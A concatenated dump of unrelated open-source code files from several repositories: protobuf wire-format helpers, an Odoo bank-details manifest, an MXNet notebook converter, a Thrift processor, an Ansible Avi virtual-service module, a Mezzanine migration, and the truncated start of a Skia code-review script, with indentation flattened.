WIRETYPE_START_GROUP = 3
WIRETYPE_END_GROUP = 4
WIRETYPE_FIXED32 = 5
_WIRETYPE_MAX = 5
INT32_MAX = int((1 << 31) - 1)
INT32_MIN = int(-(1 << 31))
UINT32_MAX = (1 << 32) - 1
INT64_MAX = (1 << 63) - 1
INT64_MIN = -(1 << 63)
UINT64_MAX = (1 << 64) - 1
FORMAT_UINT32_LITTLE_ENDIAN = '<I'
FORMAT_UINT64_LITTLE_ENDIAN = '<Q'
FORMAT_FLOAT_LITTLE_ENDIAN = '<f'
FORMAT_DOUBLE_LITTLE_ENDIAN = '<d'
if struct.calcsize(FORMAT_UINT32_LITTLE_ENDIAN) != 4:
raise AssertionError('Format "I" is not a 32-bit number.')
if struct.calcsize(FORMAT_UINT64_LITTLE_ENDIAN) != 8:
raise AssertionError('Format "Q" is not a 64-bit number.')
def PackTag(field_number, wire_type):
"""Returns an unsigned 32-bit integer that encodes the field number and
wire type information in standard protocol message wire format.
Args:
field_number: Expected to be an integer in the range [1, 1 << 29)
wire_type: One of the WIRETYPE_* constants.
"""
if not 0 <= wire_type <= _WIRETYPE_MAX:
raise message.EncodeError('Unknown wire type: %d' % wire_type)
return (field_number << TAG_TYPE_BITS) | wire_type
def UnpackTag(tag):
"""The inverse of PackTag(). Given an unsigned 32-bit number,
returns a (field_number, wire_type) tuple.
"""
return (tag >> TAG_TYPE_BITS), (tag & TAG_TYPE_MASK)
def ZigZagEncode(value):
"""ZigZag Transform: Encodes signed integers so that they can be
effectively used with varint encoding. See wire_format.h for
more details.
"""
if value >= 0:
return value << 1
return (value << 1) ^ (~0)
def ZigZagDecode(value):
"""Inverse of ZigZagEncode()."""
if not value & 0x1:
return value >> 1
return (value >> 1) ^ (~0)
def Int32ByteSize(field_number, int32):
return Int64ByteSize(field_number, int32)
def Int32ByteSizeNoTag(int32):
return _VarUInt64ByteSizeNoTag(0xffffffffffffffff & int32)
def Int64ByteSize(field_number, int64):
return UInt64ByteSize(field_number, 0xffffffffffffffff & int64)
def UInt32ByteSize(field_number, uint32):
return UInt64ByteSize(field_number, uint32)
def UInt64ByteSize(field_number, uint64):
return TagByteSize(field_number) + _VarUInt64ByteSizeNoTag(uint64)
def SInt32ByteSize(field_number, int32):
return UInt32ByteSize(field_number, ZigZagEncode(int32))
def SInt64ByteSize(field_number, int64):
return UInt64ByteSize(field_number, ZigZagEncode(int64))
def Fixed32ByteSize(field_number, fixed32):
return TagByteSize(field_number) + 4
def Fixed64ByteSize(field_number, fixed64):
return TagByteSize(field_number) + 8
def SFixed32ByteSize(field_number, sfixed32):
return TagByteSize(field_number) + 4
def SFixed64ByteSize(field_number, sfixed64):
return TagByteSize(field_number) + 8
def FloatByteSize(field_number, flt):
return TagByteSize(field_number) + 4
def DoubleByteSize(field_number, double):
return TagByteSize(field_number) + 8
def BoolByteSize(field_number, b):
return TagByteSize(field_number) + 1
def EnumByteSize(field_number, enum):
return UInt32ByteSize(field_number, enum)
def StringByteSize(field_number, string):
return BytesByteSize(field_number, string.encode('utf-8'))
def BytesByteSize(field_number, b):
return (TagByteSize(field_number)
+ _VarUInt64ByteSizeNoTag(len(b))
+ len(b))
def GroupByteSize(field_number, message):
return (2 * TagByteSize(field_number)
+ message.ByteSize())
def MessageByteSize(field_number, message):
return (TagByteSize(field_number)
+ _VarUInt64ByteSizeNoTag(message.ByteSize())
+ message.ByteSize())
def MessageSetItemByteSize(field_number, msg):
total_size = (2 * TagByteSize(1) + TagByteSize(2) + TagByteSize(3))
total_size += _VarUInt64ByteSizeNoTag(field_number)
message_size = msg.ByteSize()
total_size += _VarUInt64ByteSizeNoTag(message_size)
total_size += message_size
return total_size
def TagByteSize(field_number):
"""Returns the bytes required to serialize a tag with this field number."""
return _VarUInt64ByteSizeNoTag(PackTag(field_number, 0))
def _VarUInt64ByteSizeNoTag(uint64):
"""Returns the number of bytes required to serialize a single varint
using boundary value comparisons. (unrolled loop optimization -WPierce)
uint64 must be unsigned.
"""
if uint64 <= 0x7f: return 1
if uint64 <= 0x3fff: return 2
if uint64 <= 0x1fffff: return 3
if uint64 <= 0xfffffff: return 4
if uint64 <= 0x7ffffffff: return 5
if uint64 <= 0x3ffffffffff: return 6
if uint64 <= 0x1ffffffffffff: return 7
if uint64 <= 0xffffffffffffff: return 8
if uint64 <= 0x7fffffffffffffff: return 9
if uint64 > UINT64_MAX:
raise message.EncodeError('Value out of range: %d' % uint64)
return 10
NON_PACKABLE_TYPES = (
descriptor.FieldDescriptor.TYPE_STRING,
descriptor.FieldDescriptor.TYPE_GROUP,
descriptor.FieldDescriptor.TYPE_MESSAGE,
descriptor.FieldDescriptor.TYPE_BYTES
)
def IsTypePackable(field_type):
"""Return true iff packable = true is valid for fields of this type.
Args:
field_type: a FieldDescriptor::Type value.
Returns:
True iff fields of this type are packable.
"""
return field_type not in NON_PACKABLE_TYPES
|
papouso/odoo
|
refs/heads/8.0
|
addons/l10n_fr_rib/__openerp__.py
|
425
|
# -*- encoding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2011 Numérigraphe SARL.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
{
'name': 'French RIB Bank Details',
'version': '1.0',
'category': 'Hidden/Dependency',
'description': """
This module lets users enter the banking details of Partners in the RIB format (French standard for bank accounts details).
===========================================================================================================================
RIB Bank Accounts can be entered in the "Accounting" tab of the Partner form by specifying the account type "RIB".
The four standard RIB fields will then become mandatory:
--------------------------------------------------------
- Bank Code
- Office Code
- Account number
- RIB key
As a safety measure, OpenERP will check the RIB key whenever a RIB is saved, and
will refuse to record the data if the key is incorrect. Please bear in mind that
this can only happen when the user presses the 'save' button, for example on the
Partner Form. Since each bank account may relate to a Bank, users may enter the
RIB Bank Code in the Bank form - it will the pre-fill the Bank Code on the RIB
when they select the Bank. To make this easier, this module will also let users
find Banks using their RIB code.
The module base_iban can be a useful addition to this module, because French banks
are now progressively adopting the international IBAN format instead of the RIB format.
The RIB and IBAN codes for a single account can be entered by recording two Bank
Accounts in OpenERP: the first with the type 'RIB', the second with the type 'IBAN'.
""",
'author' : u'Numérigraphe SARL',
'depends': ['account', 'base_iban'],
'data': ['bank_data.xml', 'bank_view.xml'],
'installable': True,
'auto_install': False,
}
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
DickJC123/mxnet
|
refs/heads/master
|
docs/python_docs/python/scripts/md2ipynb.py
|
7
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import sys
import os
import time
import notedown
import nbformat
def md2ipynb():
assert len(sys.argv) == 3, 'usage: input.md output.rst'
(src_fn, input_fn, output_fn) = sys.argv
# timeout for each notebook, in sec
timeout = 20 * 60
# if enable evaluation
do_eval = int(os.environ.get('EVAL', True))
reader = notedown.MarkdownReader(match='strict')
with open(input_fn, 'r', encoding="utf8") as f:
notebook = reader.read(f)
if do_eval:
tic = time.time()
notedown.run(notebook, timeout)
print('%s: Evaluated %s in %f sec'%(src_fn, input_fn, time.time()-tic))
# need to add language info to for syntax highlight
notebook['metadata'].update({'language_info':{'name':'python'}})
with open(output_fn, 'w', encoding='utf-8') as f:
f.write(nbformat.writes(notebook))
print('%s: Write results into %s'%(src_fn, output_fn))
if __name__ == '__main__':
md2ipynb()
|
petteyg/intellij-community
|
refs/heads/master
|
python/helpers/profiler/thrift/TMultiplexedProcessor.py
|
146
|
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
from thrift.Thrift import TProcessor, TMessageType, TException
from thrift.protocol import TProtocolDecorator, TMultiplexedProtocol
class TMultiplexedProcessor(TProcessor):
def __init__(self):
self.services = {}
def registerProcessor(self, serviceName, processor):
self.services[serviceName] = processor
def process(self, iprot, oprot):
(name, type, seqid) = iprot.readMessageBegin();
if type != TMessageType.CALL & type != TMessageType.ONEWAY:
raise TException("TMultiplex protocol only supports CALL & ONEWAY")
index = name.find(TMultiplexedProtocol.SEPARATOR)
if index < 0:
raise TException("Service name not found in message name: " + name + ". Did you forget to use TMultiplexProtocol in your client?")
serviceName = name[0:index]
call = name[index+len(TMultiplexedProtocol.SEPARATOR):]
if not serviceName in self.services:
raise TException("Service name not found: " + serviceName + ". Did you forget to call registerProcessor()?")
standardMessage = (
call,
type,
seqid
)
return self.services[serviceName].process(StoredMessageProtocol(iprot, standardMessage), oprot)
class StoredMessageProtocol(TProtocolDecorator.TProtocolDecorator):
def __init__(self, protocol, messageBegin):
TProtocolDecorator.TProtocolDecorator.__init__(self, protocol)
self.messageBegin = messageBegin
def readMessageBegin(self):
return self.messageBegin
|
richardcs/ansible
|
refs/heads/devel
|
lib/ansible/modules/network/avi/avi_virtualservice.py
|
29
|
#!/usr/bin/python
#
# @author: Gaurav Rastogi ([email protected])
# Eric Anderson ([email protected])
# module_check: supported
# Avi Version: 17.1.1
#
# Copyright: (c) 2017 Gaurav Rastogi, <[email protected]>
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
#
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: avi_virtualservice
author: Gaurav Rastogi (@grastogi23) <[email protected]>
short_description: Module for setup of VirtualService Avi RESTful Object
description:
- This module is used to configure VirtualService object
- more examples at U(https://github.com/avinetworks/devops)
requirements: [ avisdk ]
version_added: "2.3"
options:
state:
description:
- The state that should be applied on the entity.
default: present
choices: ["absent", "present"]
avi_api_update_method:
description:
- Default method for object update is HTTP PUT.
- Setting to patch will override that behavior to use HTTP PATCH.
version_added: "2.5"
default: put
choices: ["put", "patch"]
avi_api_patch_op:
description:
- Patch operation to use when using avi_api_update_method as patch.
version_added: "2.5"
choices: ["add", "replace", "delete"]
active_standby_se_tag:
description:
- This configuration only applies if the virtualservice is in legacy active standby ha mode and load distribution among active standby is enabled.
- This field is used to tag the virtualservice so that virtualservices with the same tag will share the same active serviceengine.
- Virtualservices with different tags will have different active serviceengines.
- If one of the serviceengine's in the serviceenginegroup fails, all virtualservices will end up using the same active serviceengine.
- Redistribution of the virtualservices can be either manual or automated when the failed serviceengine recovers.
- Redistribution is based on the auto redistribute property of the serviceenginegroup.
- Enum options - ACTIVE_STANDBY_SE_1, ACTIVE_STANDBY_SE_2.
- Default value when not specified in API or module is interpreted by Avi Controller as ACTIVE_STANDBY_SE_1.
analytics_policy:
description:
- Determines analytics settings for the application.
analytics_profile_ref:
description:
- Specifies settings related to analytics.
- It is a reference to an object of type analyticsprofile.
application_profile_ref:
description:
- Enable application layer specific features for the virtual service.
- It is a reference to an object of type applicationprofile.
auto_allocate_floating_ip:
description:
- Auto-allocate floating/elastic ip from the cloud infrastructure.
- Field deprecated in 17.1.1.
- Default value when not specified in API or module is interpreted by Avi Controller as False.
type: bool
auto_allocate_ip:
description:
- Auto-allocate vip from the provided subnet.
- Field deprecated in 17.1.1.
- Default value when not specified in API or module is interpreted by Avi Controller as False.
type: bool
availability_zone:
description:
- Availability-zone to place the virtual service.
- Field deprecated in 17.1.1.
avi_allocated_fip:
description:
- (internal-use) fip allocated by avi in the cloud infrastructure.
- Field deprecated in 17.1.1.
- Default value when not specified in API or module is interpreted by Avi Controller as False.
type: bool
avi_allocated_vip:
description:
- (internal-use) vip allocated by avi in the cloud infrastructure.
- Field deprecated in 17.1.1.
- Default value when not specified in API or module is interpreted by Avi Controller as False.
type: bool
bulk_sync_kvcache:
description:
- (this is a beta feature).
- Sync key-value cache to the new ses when vs is scaled out.
- For ex ssl sessions are stored using vs's key-value cache.
- When the vs is scaled out, the ssl session information is synced to the new se, allowing existing ssl sessions to be reused on the new se.
- Field introduced in 17.2.7, 18.1.1.
- Default value when not specified in API or module is interpreted by Avi Controller as False.
version_added: "2.6"
type: bool
client_auth:
description:
- Http authentication configuration for protected resources.
close_client_conn_on_config_update:
description:
- Close client connection on vs config update.
- Field introduced in 17.2.4.
- Default value when not specified in API or module is interpreted by Avi Controller as False.
version_added: "2.5"
type: bool
cloud_config_cksum:
description:
- Checksum of cloud configuration for vs.
- Internally set by cloud connector.
cloud_ref:
description:
- It is a reference to an object of type cloud.
cloud_type:
description:
- Enum options - cloud_none, cloud_vcenter, cloud_openstack, cloud_aws, cloud_vca, cloud_apic, cloud_mesos, cloud_linuxserver, cloud_docker_ucp,
- cloud_rancher, cloud_oshift_k8s, cloud_azure.
- Default value when not specified in API or module is interpreted by Avi Controller as CLOUD_NONE.
connections_rate_limit:
description:
- Rate limit the incoming connections to this virtual service.
content_rewrite:
description:
- Profile used to match and rewrite strings in request and/or response body.
created_by:
description:
- Creator name.
delay_fairness:
description:
- Select the algorithm for qos fairness.
- This determines how multiple virtual services sharing the same service engines will prioritize traffic over a congested network.
- Default value when not specified in API or module is interpreted by Avi Controller as False.
type: bool
description:
description:
- User defined description for the object.
discovered_network_ref:
description:
- (internal-use) discovered networks providing reachability for client facing virtual service ip.
- This field is deprecated.
- It is a reference to an object of type network.
- Field deprecated in 17.1.1.
discovered_networks:
description:
- (internal-use) discovered networks providing reachability for client facing virtual service ip.
- This field is used internally by avi, not editable by the user.
- Field deprecated in 17.1.1.
discovered_subnet:
description:
- (internal-use) discovered subnets providing reachability for client facing virtual service ip.
- This field is deprecated.
- Field deprecated in 17.1.1.
dns_info:
description:
- Service discovery specific data including fully qualified domain name, type and time-to-live of the dns record.
- Note that only one of fqdn and dns_info setting is allowed.
dns_policies:
description:
- Dns policies applied on the dns traffic of the virtual service.
- Field introduced in 17.1.1.
version_added: "2.4"
east_west_placement:
description:
- Force placement on all se's in service group (mesos mode only).
- Default value when not specified in API or module is interpreted by Avi Controller as False.
type: bool
enable_autogw:
description:
- Response traffic to clients will be sent back to the source mac address of the connection, rather than statically sent to a default gateway.
- Default value when not specified in API or module is interpreted by Avi Controller as True.
type: bool
enable_rhi:
description:
- Enable route health injection using the bgp config in the vrf context.
type: bool
enable_rhi_snat:
description:
- Enable route health injection for source nat'ted floating ip address using the bgp config in the vrf context.
type: bool
enabled:
description:
- Enable or disable the virtual service.
- Default value when not specified in API or module is interpreted by Avi Controller as True.
type: bool
error_page_profile_ref:
description:
- Error page profile to be used for this virtualservice.this profile is used to send the custom error page to the client generated by the proxy.
- It is a reference to an object of type errorpageprofile.
- Field introduced in 17.2.4.
version_added: "2.5"
floating_ip:
description:
- Floating ip to associate with this virtual service.
- Field deprecated in 17.1.1.
floating_subnet_uuid:
description:
- If auto_allocate_floating_ip is true and more than one floating-ip subnets exist, then the subnet for the floating ip address allocation.
- This field is applicable only if the virtualservice belongs to an openstack or aws cloud.
- In openstack or aws cloud it is required when auto_allocate_floating_ip is selected.
- Field deprecated in 17.1.1.
flow_dist:
description:
- Criteria for flow distribution among ses.
- Enum options - LOAD_AWARE, CONSISTENT_HASH_SOURCE_IP_ADDRESS, CONSISTENT_HASH_SOURCE_IP_ADDRESS_AND_PORT.
- Default value when not specified in API or module is interpreted by Avi Controller as LOAD_AWARE.
flow_label_type:
description:
- Criteria for flow labelling.
- Enum options - NO_LABEL, APPLICATION_LABEL, SERVICE_LABEL.
- Default value when not specified in API or module is interpreted by Avi Controller as NO_LABEL.
fqdn:
description:
- Dns resolvable, fully qualified domain name of the virtualservice.
- Only one of 'fqdn' and 'dns_info' configuration is allowed.
host_name_xlate:
description:
- Translate the host name sent to the servers to this value.
- Translate the host name sent from servers back to the value used by the client.
http_policies:
description:
- Http policies applied on the data traffic of the virtual service.
ign_pool_net_reach:
description:
- Ignore pool servers network reachability constraints for virtual service placement.
- Default value when not specified in API or module is interpreted by Avi Controller as False.
type: bool
ip_address:
description:
- Ip address of the virtual service.
- Field deprecated in 17.1.1.
ipam_network_subnet:
description:
- Subnet and/or network for allocating virtualservice ip by ipam provider module.
- Field deprecated in 17.1.1.
l4_policies:
description:
- L4 policies applied to the data traffic of the virtual service.
- Field introduced in 17.2.7.
version_added: "2.6"
limit_doser:
description:
- Limit potential dos attackers who exceed max_cps_per_client significantly to a fraction of max_cps_per_client for a while.
- Default value when not specified in API or module is interpreted by Avi Controller as False.
type: bool
max_cps_per_client:
description:
- Maximum connections per second per client ip.
- Allowed values are 10-1000.
- Special values are 0- 'unlimited'.
- Default value when not specified in API or module is interpreted by Avi Controller as 0.
microservice_ref:
description:
- Microservice representing the virtual service.
- It is a reference to an object of type microservice.
name:
description:
- Name for the virtual service.
required: true
network_profile_ref:
description:
- Determines network settings such as protocol, tcp or udp, and related options for the protocol.
- It is a reference to an object of type networkprofile.
network_ref:
description:
- Manually override the network on which the virtual service is placed.
- It is a reference to an object of type network.
- Field deprecated in 17.1.1.
network_security_policy_ref:
description:
- Network security policies for the virtual service.
- It is a reference to an object of type networksecuritypolicy.
nsx_securitygroup:
description:
- A list of nsx service groups representing the clients which can access the virtual ip of the virtual service.
- Field introduced in 17.1.1.
version_added: "2.4"
performance_limits:
description:
- Optional settings that determine performance limits like max connections or bandwdith etc.
pool_group_ref:
description:
- The pool group is an object that contains pools.
- It is a reference to an object of type poolgroup.
pool_ref:
description:
- The pool is an object that contains destination servers and related attributes such as load-balancing and persistence.
- It is a reference to an object of type pool.
port_uuid:
description:
- (internal-use) network port assigned to the virtual service ip address.
- Field deprecated in 17.1.1.
remove_listening_port_on_vs_down:
description:
- Remove listening port if virtualservice is down.
- Default value when not specified in API or module is interpreted by Avi Controller as False.
type: bool
requests_rate_limit:
description:
- Rate limit the incoming requests to this virtual service.
scaleout_ecmp:
description:
- Disable re-distribution of flows across service engines for a virtual service.
- Enable if the network itself performs flow hashing with ecmp in environments such as gcp.
- Default value when not specified in API or module is interpreted by Avi Controller as False.
type: bool
se_group_ref:
description:
- The service engine group to use for this virtual service.
- Moving to a new se group is disruptive to existing connections for this vs.
- It is a reference to an object of type serviceenginegroup.
server_network_profile_ref:
description:
- Determines the network settings profile for the server side of tcp proxied connections.
- Leave blank to use the same settings as the client to vs side of the connection.
- It is a reference to an object of type networkprofile.
service_metadata:
description:
- Metadata pertaining to the service provided by this virtual service.
- In openshift/kubernetes environments, egress pod info is stored.
- Any user input to this field will be overwritten by avi vantage.
version_added: "2.4"
service_pool_select:
description:
- Select pool based on destination port.
services:
description:
- List of services defined for this virtual service.
sideband_profile:
description:
- Sideband configuration to be used for this virtualservice.it can be used for sending traffic to sideband vips for external inspection etc.
version_added: "2.4"
snat_ip:
description:
- Nat'ted floating source ip address(es) for upstream connection to servers.
sp_pool_refs:
description:
- Gslb pools used to manage site-persistence functionality.
- Each site-persistence pool contains the virtualservices in all the other sites, that is auto-generated by the gslb manager.
- This is a read-only field for the user.
- It is a reference to an object of type pool.
- Field introduced in 17.2.2.
version_added: "2.5"
ssl_key_and_certificate_refs:
description:
- Select or create one or two certificates, ec and/or rsa, that will be presented to ssl/tls terminated connections.
- It is a reference to an object of type sslkeyandcertificate.
ssl_profile_ref:
description:
- Determines the set of ssl versions and ciphers to accept for ssl/tls terminated connections.
- It is a reference to an object of type sslprofile.
ssl_sess_cache_avg_size:
description:
- Expected number of ssl session cache entries (may be exceeded).
- Allowed values are 1024-16383.
- Default value when not specified in API or module is interpreted by Avi Controller as 1024.
static_dns_records:
description:
- List of static dns records applied to this virtual service.
- These are static entries and no health monitoring is performed against the ip addresses.
subnet:
description:
- Subnet providing reachability for client facing virtual service ip.
- Field deprecated in 17.1.1.
subnet_uuid:
description:
- It represents subnet for the virtual service ip address allocation when auto_allocate_ip is true.it is only applicable in openstack or aws cloud.
- This field is required if auto_allocate_ip is true.
- Field deprecated in 17.1.1.
tenant_ref:
description:
- It is a reference to an object of type tenant.
traffic_clone_profile_ref:
description:
- Server network or list of servers for cloning traffic.
- It is a reference to an object of type trafficcloneprofile.
- Field introduced in 17.1.1.
version_added: "2.4"
traffic_enabled:
description:
- Knob to enable the virtual service traffic on its assigned service engines.
- This setting is effective only when the enabled flag is set to true.
- Field introduced in 17.2.8.
- Default value when not specified in API or module is interpreted by Avi Controller as True.
version_added: "2.6"
type: bool
type:
description:
- Specify if this is a normal virtual service, or if it is the parent or child of an sni-enabled virtual hosted virtual service.
- Enum options - VS_TYPE_NORMAL, VS_TYPE_VH_PARENT, VS_TYPE_VH_CHILD.
- Default value when not specified in API or module is interpreted by Avi Controller as VS_TYPE_NORMAL.
url:
description:
- Avi controller URL of the object.
use_bridge_ip_as_vip:
description:
- Use bridge ip as vip on each host in mesos deployments.
- Default value when not specified in API or module is interpreted by Avi Controller as False.
type: bool
use_vip_as_snat:
description:
- Use the virtual ip as the snat ip for health monitoring and sending traffic to the backend servers instead of the service engine interface ip.
- The caveat of enabling this option is that the virtualservice cannot be configued in an active-active ha mode.
- Dns based multi vip solution has to be used for ha & non-disruptive upgrade purposes.
- Field introduced in 17.1.9,17.2.3.
- Default value when not specified in API or module is interpreted by Avi Controller as False.
version_added: "2.5"
type: bool
uuid:
description:
- Uuid of the virtualservice.
vh_domain_name:
description:
- The exact name requested from the client's sni-enabled tls hello domain name field.
- If this is a match, the parent vs will forward the connection to this child vs.
vh_parent_vs_uuid:
description:
- Specifies the virtual service acting as virtual hosting (sni) parent.
vip:
description:
- List of virtual service ips.
- While creating a 'shared vs',please use vsvip_ref to point to the shared entities.
- Field introduced in 17.1.1.
version_added: "2.4"
vrf_context_ref:
description:
- Virtual routing context that the virtual service is bound to.
- This is used to provide the isolation of the set of networks the application is attached to.
- It is a reference to an object of type vrfcontext.
vs_datascripts:
description:
- Datascripts applied on the data traffic of the virtual service.
vsvip_ref:
description:
- Mostly used during the creation of shared vs, this field refers to entities that can be shared across virtual services.
- It is a reference to an object of type vsvip.
- Field introduced in 17.1.1.
version_added: "2.4"
waf_policy_ref:
description:
- Waf policy for the virtual service.
- It is a reference to an object of type wafpolicy.
- Field introduced in 17.2.1.
version_added: "2.5"
weight:
description:
- The quality of service weight to assign to traffic transmitted from this virtual service.
- A higher weight will prioritize traffic versus other virtual services sharing the same service engines.
- Allowed values are 1-128.
- Default value when not specified in API or module is interpreted by Avi Controller as 1.
extends_documentation_fragment:
- avi
'''
EXAMPLES = """
- name: Create SSL Virtual Service using Pool testpool2
avi_virtualservice:
controller: 10.10.27.90
username: admin
password: AviNetworks123!
name: newtestvs
state: present
performance_limits:
max_concurrent_connections: 1000
services:
- port: 443
enable_ssl: true
- port: 80
ssl_profile_ref: '/api/sslprofile?name=System-Standard'
application_profile_ref: '/api/applicationprofile?name=System-Secure-HTTP'
ssl_key_and_certificate_refs:
- '/api/sslkeyandcertificate?name=System-Default-Cert'
ip_address:
addr: 10.90.131.103
type: V4
pool_ref: '/api/pool?name=testpool2'
"""
RETURN = '''
obj:
description: VirtualService (api/virtualservice) object
returned: success, changed
type: dict
'''
from ansible.module_utils.basic import AnsibleModule
try:
from ansible.module_utils.network.avi.avi import (
avi_common_argument_spec, HAS_AVI, avi_ansible_api)
except ImportError:
HAS_AVI = False
def main():
argument_specs = dict(
state=dict(default='present',
choices=['absent', 'present']),
avi_api_update_method=dict(default='put',
choices=['put', 'patch']),
avi_api_patch_op=dict(choices=['add', 'replace', 'delete']),
active_standby_se_tag=dict(type='str',),
analytics_policy=dict(type='dict',),
analytics_profile_ref=dict(type='str',),
application_profile_ref=dict(type='str',),
auto_allocate_floating_ip=dict(type='bool',),
auto_allocate_ip=dict(type='bool',),
availability_zone=dict(type='str',),
avi_allocated_fip=dict(type='bool',),
avi_allocated_vip=dict(type='bool',),
bulk_sync_kvcache=dict(type='bool',),
client_auth=dict(type='dict',),
close_client_conn_on_config_update=dict(type='bool',),
cloud_config_cksum=dict(type='str',),
cloud_ref=dict(type='str',),
cloud_type=dict(type='str',),
connections_rate_limit=dict(type='dict',),
content_rewrite=dict(type='dict',),
created_by=dict(type='str',),
delay_fairness=dict(type='bool',),
description=dict(type='str',),
discovered_network_ref=dict(type='list',),
discovered_networks=dict(type='list',),
discovered_subnet=dict(type='list',),
dns_info=dict(type='list',),
dns_policies=dict(type='list',),
east_west_placement=dict(type='bool',),
enable_autogw=dict(type='bool',),
enable_rhi=dict(type='bool',),
enable_rhi_snat=dict(type='bool',),
enabled=dict(type='bool',),
error_page_profile_ref=dict(type='str',),
floating_ip=dict(type='dict',),
floating_subnet_uuid=dict(type='str',),
flow_dist=dict(type='str',),
flow_label_type=dict(type='str',),
fqdn=dict(type='str',),
host_name_xlate=dict(type='str',),
http_policies=dict(type='list',),
ign_pool_net_reach=dict(type='bool',),
ip_address=dict(type='dict',),
ipam_network_subnet=dict(type='dict',),
l4_policies=dict(type='list',),
limit_doser=dict(type='bool',),
max_cps_per_client=dict(type='int',),
microservice_ref=dict(type='str',),
name=dict(type='str', required=True),
network_profile_ref=dict(type='str',),
network_ref=dict(type='str',),
network_security_policy_ref=dict(type='str',),
nsx_securitygroup=dict(type='list',),
performance_limits=dict(type='dict',),
pool_group_ref=dict(type='str',),
pool_ref=dict(type='str',),
port_uuid=dict(type='str',),
remove_listening_port_on_vs_down=dict(type='bool',),
requests_rate_limit=dict(type='dict',),
scaleout_ecmp=dict(type='bool',),
se_group_ref=dict(type='str',),
server_network_profile_ref=dict(type='str',),
service_metadata=dict(type='str',),
service_pool_select=dict(type='list',),
services=dict(type='list',),
sideband_profile=dict(type='dict',),
snat_ip=dict(type='list',),
sp_pool_refs=dict(type='list',),
ssl_key_and_certificate_refs=dict(type='list',),
ssl_profile_ref=dict(type='str',),
ssl_sess_cache_avg_size=dict(type='int',),
static_dns_records=dict(type='list',),
subnet=dict(type='dict',),
subnet_uuid=dict(type='str',),
tenant_ref=dict(type='str',),
traffic_clone_profile_ref=dict(type='str',),
traffic_enabled=dict(type='bool',),
type=dict(type='str',),
url=dict(type='str',),
use_bridge_ip_as_vip=dict(type='bool',),
use_vip_as_snat=dict(type='bool',),
uuid=dict(type='str',),
vh_domain_name=dict(type='list',),
vh_parent_vs_uuid=dict(type='str',),
vip=dict(type='list',),
vrf_context_ref=dict(type='str',),
vs_datascripts=dict(type='list',),
vsvip_ref=dict(type='str',),
waf_policy_ref=dict(type='str',),
weight=dict(type='int',),
)
argument_specs.update(avi_common_argument_spec())
module = AnsibleModule(
argument_spec=argument_specs, supports_check_mode=True)
if not HAS_AVI:
return module.fail_json(msg=(
'Avi python API SDK (avisdk>=17.1) is not installed. '
'For more details visit https://github.com/avinetworks/sdk.'))
return avi_ansible_api(module, 'virtualservice',
set([]))
if __name__ == '__main__':
main()
|
Bharath-J/Mezzanine
|
refs/heads/master
|
mezzanine/galleries/migrations/0002_auto_20141227_0224.py
|
46
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
import mezzanine.core.fields
class Migration(migrations.Migration):
dependencies = [
('galleries', '0001_initial'),
]
operations = [
migrations.AlterField(
model_name='galleryimage',
name='_order',
field=mezzanine.core.fields.OrderField(null=True, verbose_name='Order'),
preserve_default=True,
),
]
|
MinimalOS/external_skia
|
refs/heads/lp-mr1
|
tools/add_codereview_message.py
|
68
|
#!/usr/bin/python2
# Copyright 2014 Google Inc.
#
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Add message to codereview issue.
This script takes a codereview URL or a codereview issue number as its
argument and a (possibly multi-line) message on stdin. It then calls
`git cl upload` to append the message to the given codereview issue.
Usage:
echo MESSAGE | %prog -c CHECKOUT_PATH CODEREVIEW_ISSUE
or:
cd /path/to/git/checkout
%prog CODEREVIEW_ISSUE <<EOF
MESSAGE
EOF
or:
%prog --help
"""
import optparse
import os
import sys
import git_utils
import misc_utils
DEFAULT_REVIEWERS = ','.join([
'[email protected]',
'[email protected]',
'[email protected]',
'[email protected]',
])
DEFAULT_CC_LIST = ','.join([
'[email protected]',
])
def add_codereview_message(codereview_url, message, checkout_path,
skip_cl_upload, verbose, reviewers, cclist):
"""Add a message to a given codereview.
Args:
codereview_url: (string) we will extract the issue number from
this url, or this could simply be the issue number.
message: (string) will be passed to `git cl upload -m $MESSAGE`
checkout_path: (string) location of the git
repository checkout to be used.
skip_cl_upload: (boolean) if true, don't actually
add the message and keep the temporary branch around.
verbose: (boolean) print out details useful for debugging.
reviewers: (string) comma-separated list of reviewers
cclist: (string) comma-separated list of addresses to be
carbon-copied
"""
# pylint: disable=I0011,R0913
git = git_utils.git_executable()
issue = codereview_url.strip('/').split('/')[-1]
vsp = misc_utils.VerboseSubprocess(verbose)
if skip_cl_upload:
branch_name = 'issue_%s' % issue
else:
branch_name = None
upstream = 'origin/master'
